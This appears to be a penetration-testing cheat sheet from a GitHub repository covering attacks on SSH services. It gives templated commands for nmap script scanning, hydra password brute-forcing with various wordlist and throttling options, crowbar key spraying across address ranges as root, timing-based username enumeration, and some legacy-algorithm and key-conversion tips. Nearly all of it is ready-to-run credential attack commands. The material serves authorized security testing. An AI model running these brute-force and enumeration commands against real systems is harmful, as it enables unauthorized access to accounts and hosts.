-
Notifications
You must be signed in to change notification settings - Fork 35
/
Target.Host.Service.SSH.txt
54 lines (31 loc) · 1.63 KB
/
Target.Host.Service.SSH.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
`` Scanning
~$ nmap -p 22 --script ssh-enum-algos,ssh-auth-methods,ssh-hostkey,ssh-publickey-acceptance,ssh-run VAR_TARGET_HOST
`` Generate public key from private
~$ ssh-keygen -f id_rsa -y > id_rsa.pub
`` Password Bruteforcing
-- Verbose (-V), ignore previous results (-I), quit if matches (-F)
-- Default port
~$ hydra -V -I -F -L VAR_WORDLIST_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST
-- Maximum wait 80, wait between 3, wait 1 per login attempt
~$ hydra -V -I -F -t 1 -w 80 -c 1 -W 3 -f -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST
-- Use single username and non-default port
~$ hydra -V -I -F -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -s VAR_TARGET_PORT -e nsr ssh://VAR_TARGET_HOST
-- Use combined file (login:pass) and host list
~$ hydra -V -F -C VAR_WORDLIST_COMBO -M VAR_TARGET_HOSTS ssh
`` With keys
`` Single
~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/id_rsa
`` All
~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/
`` All in discovery mode
~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/ -d
`` Enumerate users
~$ ssh_enum_time.py -U usernames.txt VAR_TARGET_HOST
`` Legacy issues
-- No matching key exchange method found
~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 VAR_USERNAME@VAR_TARGET_HOST
-- No matching host key type found
~$ ssh -oHostKeyAlgorithms=+ssh-dss VAR_USERNAME@VAR_TARGET_HOST
`` PuTTY to OpenSSH
~$ puttygen id_rsa.ppk -O private-openssh -o id_rsa
~$ puttygen id_rsa.ppk -O public-openssh -o id_rsa.pub